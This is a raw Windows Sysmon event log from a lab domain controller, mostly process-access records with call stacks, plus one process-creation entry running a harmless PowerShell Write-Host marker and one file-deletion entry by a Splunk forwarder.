10341000x80000000000000002240619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002240611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.612{05ADC7E1-6DAB-603E-C0AA-00000000AD01}4112C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Command Write-Host a86283d1-e837-47b2-8543-0fb570b643e8C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002240610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.607{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002240609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.592{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A64F7F2048528232059ED05E66658294,SHA256=D471E4D7E770B5F960AD5A45EA78B335FD22360B5812B950B18EB1DABF363BF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BEAA-00000000AD01}11800C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BCAA-00000000AD01}9400C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240605Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240604Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BAAA-00000000AD01}7868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240603Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240602Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240601Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240600Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240599Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240598Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240597Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.575{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240596Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 